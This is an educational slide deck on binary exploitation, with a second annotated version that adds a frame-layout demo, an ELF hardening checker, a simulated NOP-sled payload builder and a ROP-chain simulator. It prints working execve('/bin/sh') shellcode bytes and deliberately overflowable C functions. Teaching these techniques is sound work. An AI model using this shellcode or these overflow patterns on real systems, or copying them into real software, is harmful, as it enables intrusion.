Proprietary
An Introduction to Binary Exploitation
Carl Svensson / 2020-01-28
Biography
● MSc in Computer Science, KTH
● Security Engineer @ Google - Offensive Security
● CTF Player: HackingForSoju
● Email: zetatwo@google.com / Twitter: @zetatwo
Agenda
● Background
● Stack-based Exploitation
● Protections and bypasses
● Heap-based exploitation
● Next steps
Background
Who Are You?
● Programmer
● Security Interested
● Basic knowledge of some low-level language, e.g. C or C++
● Basic understanding of operating systems
What is an Exploit?
● Unintended behaviour
● State machine
○ Initial state
○ Reachable state
○ Invalid state
● Vulnerability
○ Unintended transition (bug)
○ Enabling an exploit
● Exploit
○ Transition to an Invalid state
○ "Dangerous" subset
A Note on Data
● We organize bits into groups - nibble, byte, word, dword, qword
● Bits are interpreted as integers, text, code, addresses, etc.
● Same data, different interpretations - Context determines
● Remember endianness - Little vs big
The same four bytes 0x41 0x42 0x43 0x44, read four ways:
Integers: 65, 66, 67, 68
Text: "ABCD"
x86 code: inc ecx; inc edx; inc ebx; inc esp
Little-endian dword: 0x44434241 = 1145258561
Byte order of the dword 0x44332211 in memory:
Little: 0x44332211 = 0x11 0x22 0x33 0x44
Big: 0x44332211 = 0x44 0x33 0x22 0x11
Where are We?
● Physics - Maxwell’s equations
● Circuits - Gates, flip-flops, wires
● Micro-architecture - Internals of CPU
● Machine code - Assembly translated to bytes
● Low-level code - C, Rust
● Mid-level code - Java, C#
● High-level code - Python, Javascript
x86 Basics
x86 Memory
● Virtual memory
● Stack
● Heap
● Code - Text
x86 Registers
● General purpose
○ RAX, RBX, RCX, RDX
○ RDI, RSI, R8, R9
● Special purpose
○ RIP, RBP, RSP
● ...and a few hundred more
x86 Calling convention
● Architecture specific
● x86, 32 bit, 64 bit
● Arguments
○ 32 bit: stack in reverse order
○ 64 bit: first few in registers
● Stack frame - base pointer
32 bit:
call 0xCAFEC0DE  =  push eip+5; jmp 0xCAFEC0DE
ret              =  pop eip
f(a, b)          =  push b; push a; call f
64 bit:
call rip+0x1337  =  push rip+5; jmp rip+0x1337
ret              =  pop rip
f(a, b)          =  mov rdi, a; mov rsi, b; call f
Stack-based Exploits
Stack buffer Overflow
● Unchecked write
● Overwrite adjacent memory
● Overwrite return address
void vuln() {
    long local1;
    char buf[16];
    fgets(buf, 256, stdin); /* limit exceeds sizeof buf: unchecked write */
}
Frame layout (low to high address) and the input bytes that land in each slot:
[buf (16 bytes)]            [AAAABBBBCCCCDDDD]
[local1 (8 bytes)]          [EEEEFFFF]
[saved bp (8 bytes)]        [GGGGHHHH]
[return address (8 bytes)]  [JJJJKKKK]
Program received signal SIGSEGV, Segmentation fault.
0x4B4B4B4B4A4A4A4A in example1 ()
The faulting address is the overwritten return address: "JJJJKKKK" read as a little-endian qword.
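To make the frame picture above concrete, the following is an added example (not code from the deck) that lays the 40 marker bytes over the slide's frame layout and explains the reported crash address: the eight bytes that landed on the return-address slot, read as a little-endian qword, are 0x4B4B4B4B4A4A4A4A. The same struct calls also revisit the "same data, different interpretations" point from the data slide. FRAME, SAMPLE and the function names are this example's own, built from the slide's layout; Python is used because it is the tooling language the deck itself recommends.

```python
"""Added example: where overflowed input lands in the slide's stack frame."""
import struct

# Frame layout from the slide, lowest address first. fgets writes from the
# start of buf upward, so surplus bytes run into local1, the saved base
# pointer and finally the return address.
FRAME = [("buf", 16), ("local1", 8), ("saved bp", 8), ("return address", 8)]

# Constructed input matching the slide's picture: 40 bytes of marker letters.
SAMPLE = b"AAAABBBBCCCCDDDD" + b"EEEEFFFF" + b"GGGGHHHH" + b"JJJJKKKK"


def place_input(frame, data):
    """Return {slot: bytes} showing which input bytes land in each frame slot.

    Slots the input does not reach get b"" (their contents stay untouched);
    anything past the last slot is reported under "beyond frame".
    """
    placed, pos = {}, 0
    for name, size in frame:
        placed[name] = data[pos:pos + size]
        pos += size
    placed["beyond frame"] = data[pos:]
    return placed


def faulting_address(frame, data):
    """Explain a crash like the slide's "SIGSEGV at 0x4B4B4B4B4A4A4A4A".

    On x86-64 the return address is an 8-byte little-endian value, so the
    first marker byte written to that slot becomes the lowest byte of the
    address the CPU tries to return to. Returns None when the input did not
    fully cover the slot (a short or partial overwrite).
    """
    slot = place_input(frame, data)["return address"]
    if len(slot) < 8:
        return None
    return struct.unpack("<Q", slot)[0]


def interpretations(chunk):
    """The data slide's point: one 4-byte sequence, several readings."""
    if len(chunk) != 4:
        raise ValueError("expected exactly four bytes")
    return {
        "integers": list(chunk),
        "text": chunk.decode("ascii", errors="replace"),
        "little-endian dword": struct.unpack("<I", chunk)[0],
        "big-endian dword": struct.unpack(">I", chunk)[0],
    }


if __name__ == "__main__":
    for slot, content in place_input(FRAME, SAMPLE).items():
        print(f"{slot:16s} {content!r}")
    print(hex(faulting_address(FRAME, SAMPLE)))  # 0x4b4b4b4b4a4a4a4a
    print(interpretations(b"ABCD"))
```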
Shellcode
● Code that launches a shell
● Can also do other things
● Mostly written in C or ASM
● Needs to be location independent
x86-64 assembly:
xor rdx, rdx
mov qword rbx, '//bin/sh'
shr rbx, 0x8
push rbx
mov rdi, rsp
push rax
push rdi
mov rsi, rsp
mov al, 0x3b
syscall
Assembled bytes:
0x48 0x31 0xd2 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f
0x73 0x68 0x48 0xc1 0xeb 0x08 0x53 0x48 0x89 0xe7
0x50 0x57 0x48 0x89 0xe6 0xb0 0x3b 0x0f 0x05
Stack buffer overflow ('96)
● No protections present
● No longer viable
● A simple attack
○ Inject code
○ Overwrite return address with shellcode location
void vuln() {
    long local1;
    char buf[16];
    fgets(buf, 256, stdin); /* limit exceeds sizeof buf: unchecked write */
}
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
[buf (16 bytes)]            0x00007FFFDEADC0DE: [0x48 0x31 0xd2 0x48 ...]
[local1 (8 bytes)]          [...]
[saved bp (8 bytes)]        [... 0x3b 0x0f 0x05]
[return address (8 bytes)]  [0x00007FFFDEADC0DE]
Shellcode placement
● Shellcode can be moved around
● For example further down the stack
● If exact location is unknown
○ NOP sled
void vuln() {
    long local1;
    char buf[12];
    fgets(buf, 256, stdin); /* limit exceeds sizeof buf: unchecked write */
}
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
[buf (12 bytes)]            0x00007FFFDEADC0DE: [...]
[local1 (8 bytes)]          [...]
[saved bp (8 bytes)]        [...]
[return address (8 bytes)]  [0x00007FFFDEADC102]
[prev frame (? bytes)]      [0x48 0x31 0xd2 …]
Protection: ASLR ('01)
● Address Space Layout Randomization
● Randomize location of stack and heap
○ 32 bit: 12 bit entropy
○ 64 bit: 28 bit entropy
● So far code location still known
● Location of buffer now unknown
● Code reuse
○ Gadgets
Gadget at a known code address:
0x00007FFFCAFECAFE:
jmp rsp
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
[buf (16 bytes)]            0x????????: [...]
[local1 (8 bytes)]          [...]
[saved bp (8 bytes)]        [...]
[return address (8 bytes)]  [0x00007FFFCAFECAFE]
[prev frame (? bytes)]      [0x48 0x31 0xd2 …]
Protection: NX/DEP ('97)
● Adds permission bits to memory
○ Code: RX
○ Heap+Stack: RW
● Shellcode on stack not possible
● Code location known
● Gadgets
○ Return-oriented programming
Gadgets in code:
0x4000104A:
...
pop eax
ret
0x4000106A:
...
pop ebx
pop ecx
ret
Stack after the overflow (address unknown, 0x????????):
[AAAA...DDDD]
[EEEE]
[FFFF]
[0x4000104A]
[0xDEADBEEF]
[0x4000106A]
[0xCAFEBABE]
[0xFEEDF00D]
After returning through both gadgets:
eax = 0xDEADBEEF
ebx = 0xCAFEBABE
ecx = 0xFEEDF00D
Protection: StackGuard ('98)
● Catch the overflow before damage
● Canary - random secret value
● The crash becomes controlled
● Relies on canary being secret
○ Memory leak
○ Forking servers
Source:
void vuln() {
    long local1;
    char buf[12];
    fgets(buf, 256, stdin); /* limit exceeds sizeof buf: unchecked write */
}
What the compiler effectively emits:
void vuln() {
    push_cookie();
    long local1;
    char buf[12];
    fgets(buf, 256, stdin);
    check_cookie();
}
Frame with the canary (SECRET = ???) and an overflow of 'A' bytes that clobbers it:
[...] [...]                 [...] [...]
[SECRET]                    [0x4141414141414141]
[saved bp (8 bytes)]        [0x4141414141414141]
[return address (8 bytes)]  [0x00007FFFDEADC0DE]
*** stack smashing detected ***: ./a.out terminated
======= Backtrace: =========
GOT/PLT Overwrite
● Procedure Linkage Table, PLT
● Global Offset Table, GOT
● PLT contains stubs with jumps
● GOT contains addresses to libraries
● Overwrite GOT entry and call function
Before:
...
call printf@plt
...
printf@plt:
    jmp [printf@got]
printf@got: 0x7FFFC0DECAFE
After overwriting the GOT entry:
printf@got: 0x7FFFDEADDEAD
…
call printf@plt -> 0x7FFFDEADDEAD
...
Protection: RELRO
● RELocation Read Only, RELRO
● "Partial RELRO"
○ GOT before BSS
● Full RELRO
○ Actually Read Only
○ Handled by loader
...
call printf@plt
...
printf@plt:
    jmp [printf@got]
printf@got: 0x7FFFC0DECAFE
printf@got: 0x7FFFDEADDEAD   (attempted overwrite rejected: the GOT is read-only)
…
call printf@plt -> 0x7FFFC0DECAFE
...
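The NX, RELRO and GOT/PLT slides above each correspond to metadata a defender can read straight from the binary, as does the ASLR slide's note that code stays at a known address unless the executable is position independent. The following added example (not the deck's code) parses ELF64 program headers and the dynamic section to report NX, RELRO (none/partial/full) and PIE; the two sample images are constructed in memory with only the headers the checks need, so it runs offline, and the function names are this example's own.

```python
"""Added example: read NX, RELRO and PIE state straight from ELF64 headers."""
import struct

# Constants from the ELF specification (elf.h), named as the loader names them.
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

EHDR = "<16sHHIQQQIHHHHHH"  # Elf64_Ehdr, little-endian, 64 bytes
PHDR = "<IIQQQQQQ"          # Elf64_Phdr, 56 bytes
DYN = "<qQ"                 # Elf64_Dyn, 16 bytes


def program_headers(data):
    """Return (e_type, [(p_type, p_flags, p_offset, p_filesz), ...])."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    hdr = struct.unpack_from(EHDR, data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    segments = []
    for i in range(e_phnum):
        p = struct.unpack_from(PHDR, data, e_phoff + i * e_phentsize)
        segments.append((p[0], p[1], p[2], p[5]))
    return e_type, segments


def dynamic_tags(data, segments):
    """Return {d_tag: d_val} from the PT_DYNAMIC segment, stopping at DT_NULL."""
    tags = {}
    for p_type, _flags, p_offset, p_filesz in segments:
        if p_type != PT_DYNAMIC:
            continue
        for off in range(p_offset, p_offset + p_filesz, 16):
            d_tag, d_val = struct.unpack_from(DYN, data, off)
            if d_tag == DT_NULL:
                break
            tags[d_tag] = d_val
    return tags


def check_protections(data):
    """Classify a binary along the NX, RELRO and ASLR/PIE axes of the slides."""
    e_type, segments = program_headers(data)
    by_type = {seg[0]: seg for seg in segments}
    # NX: non-executable stack only if PT_GNU_STACK is present without PF_X;
    # a missing header leaves the stack executable by default.
    gnu_stack = by_type.get(PT_GNU_STACK)
    nx = gnu_stack is not None and not gnu_stack[1] & PF_X
    # RELRO: PT_GNU_RELRO names the range the loader re-protects read-only
    # after relocation. Without BIND_NOW the GOT stays writable for lazy
    # binding ("partial"); with BIND_NOW all symbols are resolved at load
    # time, so the GOT joins the read-only range ("full").
    tags = dynamic_tags(data, segments)
    bind_now = bool(DT_BIND_NOW in tags
                    or tags.get(DT_FLAGS, 0) & DF_BIND_NOW
                    or tags.get(DT_FLAGS_1, 0) & DF_1_NOW)
    if PT_GNU_RELRO not in by_type:
        relro = "none"
    else:
        relro = "full" if bind_now else "partial"
    # PIE: an ET_DYN executable is loaded at a random base, so ASLR also
    # moves the code; ET_EXEC leaves it at a known address.
    return {"nx": nx, "relro": relro, "pie": e_type == ET_DYN}


def build_sample_elf(nx, relro, bind_now, pie):
    """Construct a minimal ELF64 image with only the metadata checked above
    (a constructed sample for testing; it is not loadable)."""
    dyn = ([(DT_FLAGS, DF_BIND_NOW)] if bind_now else []) + [(DT_NULL, 0)]
    dynamic = b"".join(struct.pack(DYN, t, v) for t, v in dyn)
    segs = [(PT_DYNAMIC, PF_R | PF_W, len(dynamic)),
            (PT_GNU_STACK, PF_R | PF_W | (0 if nx else PF_X), 0)]
    if relro:
        segs.append((PT_GNU_RELRO, PF_R, 0))
    phoff, phsize = struct.calcsize(EHDR), struct.calcsize(PHDR)
    dyn_off = phoff + len(segs) * phsize
    phdrs = b"".join(
        struct.pack(PHDR, p_type, p_flags,
                    dyn_off if p_type == PT_DYNAMIC else 0, 0, 0, size, size, 8)
        for p_type, p_flags, size in segs)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)  # ELF64, LSB, version 1
    ehdr = struct.pack(EHDR, ident, ET_DYN if pie else ET_EXEC, 0x3E, 1, 0,
                       phoff, 0, 0, phoff, phsize, len(segs), 64, 0, 0)
    return ehdr + phdrs + dynamic


# Constructed samples: the unprotected build the early slides assume, and a
# build with NX, full RELRO and PIE enabled.
WEAK = build_sample_elf(nx=False, relro=False, bind_now=False, pie=False)
HARDENED = build_sample_elf(nx=True, relro=True, bind_now=True, pie=True)

if __name__ == "__main__":
    for name, image in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, check_protections(image))
```

The same check_protections() runs unchanged on a real binary's bytes (open the file in "rb" mode), which is how it would be used to confirm a build flag actually took effect.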
Base Pointer Overwrite
● Stack frames - linked list
● Misalign stack frame
○ Modify local variables
○ Modify stack pointer
● Partial overwrite
○ Shift stack frame
Protection: CFG ('14)
● Control Flow Guard
● Control Flow Integrity
● Intended to prevent code-reuse attacks
● Bypass example: JIT
Protection: PAC ('17)
● Pointer Authentication Code
● Reuse unused bits for MAC
● Hardware support
● ARM64, Apple iOS
● Bypass: signing oracle
○ Project Zero blog
Format String Vulnerability
● Calls to printf-like functions
● Control over first argument
● Variable number of arguments
● Read direct: %x/%d
● Read indirect: %s
● Write: %n
● Copy: %0*x, %n
● Skip: %4$x
int printf(const char *format, ...);
printf("Name: %s, age: %d", name, age); // Ok
printf(name);                            // Vulnerable: user data used as the format string
Heap-based Exploits
A Refresher on Memory
● Physical
● Virtual
● Pages
● Memory allocator
○ malloc/free
○ glibc
○ jemalloc
Heap corruption: app layer
● Heap overflow
● Use after free
● Type confusion
● Heap spraying
Heap corruption: allocator
● Corrupt allocator metadata
● Linked lists
● Requires understanding of allocator
○ Slabs
○ Bins
○ Cache
● glibc - House of X
Next Steps
Want to try it out?
Capture the Flag:
https://capturetheflag.withgoogle.com
https://ctftime.org
https://picoctf.com
Wargames:
https://github.com/zardus/wargame-nexus
https://pwnable.kr
https://overthewire.org
Community:
CTF players Discord: https://discord.gg/ArjWjvctft
Further Materials
Videos:
https://securitycreators.video
https://www.youtube.com/GynvaelEN
https://www.youtube.com/ZetaTwo
https://www.youtube.com/LiveOverflow
Tools:
Python + Pwntools
gdb + gef
IDA, Binary Ninja, Ghidra
Learning:
https://pwn.college
https://github.com/RPISEC/MBE
https://github.com/shellphish/how2heap
Interested in Google?
Internships and full-time positions:
https://careers.google.com/students
Questions about working at Google, specifically security:
Email zetatwo@google.com or Twitter @zetatwo
Thank You

[DSC] Introduction to Binary Exploitation

12. x86 Calling convention
● Architecture specific
● x86, 32 bit, 64 bit
● Arguments
○ 32 bit (e.g. cdecl): pushed on the stack in reverse order, last argument first
○ 64 bit (System V AMD64): the first six integer arguments in RDI, RSI, RDX, RCX, R8, R9, the rest on the stack
● Stack frame - base pointer: the callee saves the caller's base pointer directly below the return address, so the frames form a chain
● call pushes the address of the next instruction, ret pops it back into the instruction pointer:
  call 0xCAFEC0DE  ≈  push eip+5 ; jmp 0xCAFEC0DE    (32 bit; eip+5 is the instruction after the 5-byte call)
  call rip+0x1337  ≈  push rip+5 ; jmp rip+0x1337    (64 bit, relative call)
  ret              ≈  pop eip                         (32 bit)
  ret              ≈  pop rip                         (64 bit)
● f(a, b) compiles to
  push b ; push a ; call f             (32 bit)
  mov rdi, a ; mov rsi, b ; call f     (64 bit)
14. Stack buffer overflow
● Unchecked write
● Overwrite adjacent memory
● Overwrite return address

  void vuln() {
      long local1;
      char buf[16];
      fgets(buf, 128, stdin);   /* reads up to 127 bytes into a 16-byte buffer */
  }

Frame of vuln(), lowest address first:
  [buf (16 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)]
The input "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHJJJJKKKK" lands as:
  [AAAABBBBCCCCDDDD] [EEEEFFFF] [GGGGHHHH] [JJJJKKKK]

  Program received signal SIGSEGV, Segmentation fault.
  0x4B4B4B4B4A4A4A4A in example1 ()

The return address is read back little-endian, so the bytes "JJJJKKKK" (0x4A 0x4A 0x4A 0x4A 0x4B 0x4B 0x4B 0x4B) become 0x4B4B4B4B4A4A4A4A. Two caveats: the compiler decides the order of local1 and buf (and may add padding), so confirm the real offsets in a disassembler; and on x86-64 a non-canonical value like this one makes the ret instruction itself fault, so a debugger reports the crash at vuln's ret rather than at the bogus address.
15. Shellcode
● Code that launches a shell
● Can also do other things
● Mostly written in C or ASM
● Needs to be location independent (no absolute addresses; usually also free of NUL bytes so string functions copy it whole)

  xor rdx, rdx            ; envp = NULL
  mov qword rbx, '//bin/sh' ; 8 bytes; the double slash fills the register
  shr rbx, 0x8            ; drop one '/', leaving "/bin/sh\0"
  push rbx
  mov rdi, rsp            ; rdi = pointer to "/bin/sh"
  push rax                ; argv[1] = NULL
  push rdi                ; argv[0] = pointer to "/bin/sh"
  mov rsi, rsp            ; rsi = argv
  mov al, 0x3b            ; 0x3b = execve on x86-64 Linux
  syscall

Encoded (30 bytes, no NUL bytes):
  0x48 0x31 0xd2 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x48 0xc1 0xeb 0x08 0x53 0x48 0x89 0xe7 0x50 0x57 0x48 0x89 0xe6 0xb0 0x3b 0x0f 0x05

Caveat: this version assumes rax is already 0 when it runs. push rax is supposed to push the NULL that terminates argv, and mov al only sets the low byte of the syscall number; if rax holds anything else, argv is garbage and the wrong syscall is made. Prefixing xor eax, eax (0x31 0xc0) removes the assumption at the cost of two bytes.
16. Stack buffer overflow
● No protections present
● No longer viable on modern systems (see the protections below)
● A simple attack
○ Inject code: the shellcode goes into buf itself
○ Overwrite return address with shellcode location: buf's own address

  void vuln() {
      long local1;
      char buf[16];
      fgets(buf, 128, stdin);   /* reads up to 127 bytes into a 16-byte buffer */
  }
  $ uname -a
  Linux pwnbox 5.4.0-12.15-generic...

  [buf (16 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)]
  0x00007FFFDEADC0DE: [0x48 0x31 0xd2 0x48 ...] [...] [... 0x3b 0x0f 0x05] [0x00007FFFDEADC0DE]

The 30-byte shellcode fits in the 32 bytes in front of the return address, and the return address is overwritten with buf's address (0x00007FFFDEADC0DE here), which the attacker has to know in advance.

17. Shellcode placement
● Shellcode can be moved around
● For example further down the stack, past the return address, into the caller's frame
● If exact location is unknown
○ NOP sled: a run of 0x90 (nop) bytes in front of the shellcode; any return address that lands inside the run slides into the code

  void vuln() {
      long local1;
      char buf[12];
      fgets(buf, 128, stdin);
  }
  $ uname -a
  Linux pwnbox 5.4.0-12.15-generic...

  [buf (12 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)] [prev frame (? bytes)]
  0x00007FFFDEADC0DE: [...] [...] [...] [0x00007FFFDEADC102] [0x48 0x31 0xd2 …]

Here 0x00007FFFDEADC102 = buf + 36, i.e. the first byte after the return address, where the shellcode (or the sled in front of it) now starts.
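The three slides above, as an added example that is not part of the original deck: a payload builder that computes the distance from buf to the return address, packs the new return address little-endian, and appends a NOP sled plus shellcode, followed by a check of where each piece lands. The frame is a struct that mirrors the slides' diagram, so the "overflow" is a memcpy into that struct rather than a real crash; the sled address 0x00007FFFDEADC102, the sled length and the five placeholder code bytes are assumed values chosen for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated frame of vuln() with the layout the slides draw. The overflow
 * runs upward from buf through local1 and the saved base pointer into the
 * return address; prev_frame stands in for the caller's frame above it. */
struct frame {
    char     buf[16];
    uint64_t local1;
    uint64_t saved_bp;
    uint64_t ret_addr;
    uint8_t  prev_frame[512];
};
#define RET_OFFSET offsetof(struct frame, ret_addr)   /* 16 + 8 + 8 = 32 */

/* Little-endian helpers: the byte order the CPU uses when it pops the address. */
static void put_u64_le(uint8_t *dst, uint64_t v) {
    for (int i = 0; i < 8; i++) dst[i] = (uint8_t)(v >> (8 * i));
}
static uint64_t get_u64_le(const uint8_t *src) {
    uint64_t v = 0;
    for (int i = 0; i < 8; i++) v |= (uint64_t)src[i] << (8 * i);
    return v;
}

/* The bug: an unchecked copy into the 16-byte buffer, as fgets(buf, 128, stdin)
 * or strcpy would do. Here it overwrites the simulated frame, not the real one. */
static void vuln(struct frame *f, const uint8_t *input, size_t len) {
    memcpy(f->buf, input, len);   /* intentionally unchecked */
}

/* What the CPU would pop at ret: the 8 bytes at RET_OFFSET, read little-endian. */
uint64_t simulated_return_address(const struct frame *f) {
    return get_u64_le((const uint8_t *)f + RET_OFFSET);
}

/* Exploit payload: [filler up to the return address][ret_target][NOP sled][shellcode].
 * out must have room for RET_OFFSET + 8 + sled_len + code_len bytes. */
size_t build_payload(uint8_t *out, uint64_t ret_target, size_t sled_len,
                     const uint8_t *shellcode, size_t code_len) {
    size_t n = 0;
    memset(out + n, 'A', RET_OFFSET);     n += RET_OFFSET;  /* buf + local1 + saved bp */
    put_u64_le(out + n, ret_target);      n += 8;           /* new return address */
    memset(out + n, 0x90, sled_len);      n += sled_len;    /* NOP sled */
    memcpy(out + n, shellcode, code_len); n += code_len;    /* code right after the sled */
    return n;
}

/* Would returning to ret_target slide through NOPs into the shellcode?
 * sled_base is the assumed runtime address of f->prev_frame[0], the first
 * byte after the return address, where the sled starts. */
int sled_reaches_shellcode(const struct frame *f, uint64_t sled_base,
                           uint64_t ret_target, size_t sled_len) {
    if (ret_target < sled_base || ret_target >= sled_base + sled_len) return 0;
    for (uint64_t a = ret_target; a < sled_base + sled_len; a++)
        if (f->prev_frame[a - sled_base] != 0x90) return 0;   /* not a NOP */
    return 1;
}

/* Slide 14 replayed: AAAA...KKKK puts "JJJJKKKK" over the return address. */
uint64_t demo_slide_crash_value(void) {
    struct frame f;
    memset(&f, 0, sizeof f);
    const char *s = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHJJJJKKKK";   /* 40 bytes */
    vuln(&f, (const uint8_t *)s, strlen(s));
    return simulated_return_address(&f);   /* 0x4B4B4B4B4A4A4A4A */
}

/* Slides 16-17 replayed with an assumed sled address and placeholder code bytes. */
static const uint64_t SLED_BASE = 0x00007FFFDEADC102ULL;          /* assumed */
static const uint8_t  CODE[] = { 0x48, 0x31, 0xd2, 0x0f, 0x05 };  /* placeholder */
#define SLED_LEN 64

/* 1 if a return to ret_target reaches the code, 0 if it misses the sled,
 * -1 if the payload did not control the return address at all. */
int demo_sled_hit(uint64_t ret_target) {
    struct frame f;
    memset(&f, 0, sizeof f);
    uint8_t payload[RET_OFFSET + 8 + SLED_LEN + sizeof CODE];
    size_t n = build_payload(payload, ret_target, SLED_LEN, CODE, sizeof CODE);
    vuln(&f, payload, n);
    if (simulated_return_address(&f) != ret_target) return -1;
    return sled_reaches_shellcode(&f, SLED_BASE, ret_target, SLED_LEN);
}

int main(void) {
    printf("ret after slide-14 input: 0x%016llx\n",
           (unsigned long long)demo_slide_crash_value());
    printf("guess inside sled: %d, guess past sled: %d\n",
           demo_sled_hit(SLED_BASE + 0x10), demo_sled_hit(SLED_BASE + SLED_LEN));
    return 0;
}
```

The sled check is the reason the trick works at all: any guess in [SLED_BASE, SLED_BASE + SLED_LEN) executes only nops before reaching the code, so the attacker's estimate of the stack address only has to be right to within the sled length, not to the byte.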
18. Protection: ASLR
● Address Space Layout Randomization
● Randomize location of stack, heap and shared libraries on every run
○ 32 bit: 12 bit entropy
○ 64 bit: 28 bit entropy
● So far code location still known (the main binary only moves if it is built position independent, PIE)
● Location of buffer now unknown, so a hard-coded return address misses
● Code reuse
○ Gadgets: return into an instruction sequence at a known address instead of into the buffer

  0x00007FFFCAFECAFE: jmp rsp
  $ uname -a
  Linux pwnbox 5.4.0-12.15-generic...

  [buf (16 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)] [prev frame (? bytes)]
  0x????????: [...] [...] [...] [0x00007FFFCAFECAFE] [0x48 0x31 0xd2 …]

After the ret, rsp points at the bytes right after the return address, so jmp rsp lands in the shellcode wherever the stack happens to be.
19. Protection: NX/DEP
● Adds permission bits to memory (No-eXecute, Data Execution Prevention)
○ Code: RX
○ Heap + Stack: RW, never executable
● Shellcode on stack not possible: jumping to it faults
● Code location known (non-PIE binary, or an address leak)
● Gadgets: short instruction sequences that already exist in the code and end in ret
○ Return-oriented programming: each ret pops the next gadget address off the attacker-controlled stack

  (32-bit example)
  0x4000104A: ... pop eax ; ret
  0x4000106A: ... pop ebx ; pop ecx ; ret

  0x????????: [AAAA...DDDD] [EEEE] [FFFF] [0x4000104A] [0xDEADBEEF] [0x4000106A] [0xCAFEBABE] [0xFEEDF00D]

  result: eax = 0xDEADBEEF, ebx = 0xCAFEBABE, ecx = 0xFEEDF00D
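The chain on the slide, executed step by step: an added example (not from the deck) with a toy 32-bit machine whose only "code" is a table of the two gadgets at the slide's hypothetical addresses. It shows the mechanism that makes ROP work under NX: nothing on the stack is executed, the stack only supplies addresses and operands, and each gadget's own ret fetches the next address.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Toy 32-bit machine holding just the registers the slide's chain touches. */
struct cpu { uint32_t eax, ebx, ecx, esp; int gadgets_run; };

enum op { POP_EAX, POP_EBX, POP_ECX, RET };

struct gadget { uint32_t addr; enum op ops[4]; int nops; };

/* Gadget table with the slide's (hypothetical) addresses: instruction
 * sequences that already exist in executable memory and end in ret. */
static const struct gadget GADGETS[] = {
    { 0x4000104A, { POP_EAX, RET },          2 },
    { 0x4000106A, { POP_EBX, POP_ECX, RET }, 3 },
};

static const struct gadget *find_gadget(uint32_t addr) {
    for (size_t i = 0; i < sizeof GADGETS / sizeof GADGETS[0]; i++)
        if (GADGETS[i].addr == addr) return &GADGETS[i];
    return NULL;   /* not code we can return into: a real CPU would crash here */
}

/* The attacker-controlled stack as dwords, starting where the saved return
 * address used to be. esp indexes into it; pop reads a dword and bumps esp. */
static uint32_t pop32(struct cpu *c, const uint32_t *stack, size_t n) {
    uint32_t v = (c->esp / 4 < n) ? stack[c->esp / 4] : 0;
    c->esp += 4;
    return v;
}

/* Execute a chain: vuln()'s ret pops the first gadget address; each gadget
 * pops its operands, and its own ret pops the next gadget address. Stops when
 * a ret reads past the supplied chain. Returns the number of gadgets run,
 * or -1 if control reached an address that is not a gadget. */
int run_rop_chain(struct cpu *c, const uint32_t *stack, size_t n) {
    c->esp = 0;
    c->gadgets_run = 0;
    uint32_t eip = pop32(c, stack, n);   /* the overwritten return address */
    for (;;) {
        const struct gadget *g = find_gadget(eip);
        if (!g) return -1;
        for (int i = 0; i < g->nops; i++) {
            switch (g->ops[i]) {
            case POP_EAX: c->eax = pop32(c, stack, n); break;
            case POP_EBX: c->ebx = pop32(c, stack, n); break;
            case POP_ECX: c->ecx = pop32(c, stack, n); break;
            case RET:     eip    = pop32(c, stack, n); break;
            }
        }
        c->gadgets_run++;
        if (c->esp / 4 > n) break;   /* the last ret popped from beyond the chain */
    }
    return c->gadgets_run;
}

/* The slide's chain, exactly as it sits on the stack after the padding. */
struct cpu demo_slide_chain(void) {
    static const uint32_t chain[] = {
        0x4000104A, 0xDEADBEEF,               /* pop eax ; ret */
        0x4000106A, 0xCAFEBABE, 0xFEEDF00D,   /* pop ebx ; pop ecx ; ret */
    };
    struct cpu c = { 0, 0, 0, 0, 0 };
    run_rop_chain(&c, chain, sizeof chain / sizeof chain[0]);
    return c;
}

/* A chain whose second "gadget address" is filler: the ret into it fails. */
int demo_bad_chain(void) {
    static const uint32_t chain[] = { 0x4000104A, 0xDEADBEEF, 0x41414141 };
    struct cpu c = { 0, 0, 0, 0, 0 };
    return run_rop_chain(&c, chain, sizeof chain / sizeof chain[0]);
}

int main(void) {
    struct cpu c = demo_slide_chain();
    printf("eax=%08x ebx=%08x ecx=%08x gadgets=%d\n",
           (unsigned)c.eax, (unsigned)c.ebx, (unsigned)c.ecx, c.gadgets_run);
    printf("bad chain -> %d\n", demo_bad_chain());
    return 0;
}
```

Against a real binary the table is replaced by a gadget search over the executable segments (ROPgadget, ropper), and the values popped into registers are typically arguments for a system call or for a libc function reached through a further gadget.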
20. Protection: StackGuard
● Catch the overflow before damage
● Canary - random secret value placed between the local buffers and the saved registers
● The crash becomes controlled: the check fails and the process aborts before the corrupted return address is used
● Relies on canary being secret
○ Memory leak (a format string or over-read reveals it; on x86-64 glibc the lowest byte is 0x00 so plain string reads stop in front of it)
○ Forking servers: every child inherits the parent's canary, so it can be brute-forced one byte at a time

  void vuln() {
      long local1;
      char buf[12];
      fgets(buf, 128, stdin);
  }

  *** stack smashing detected ***: ./a.out terminated
  ======= Backtrace: =========

  SECRET = ???
  [...] [...] [SECRET] [saved bp (8 bytes)] [return address (8 bytes)]
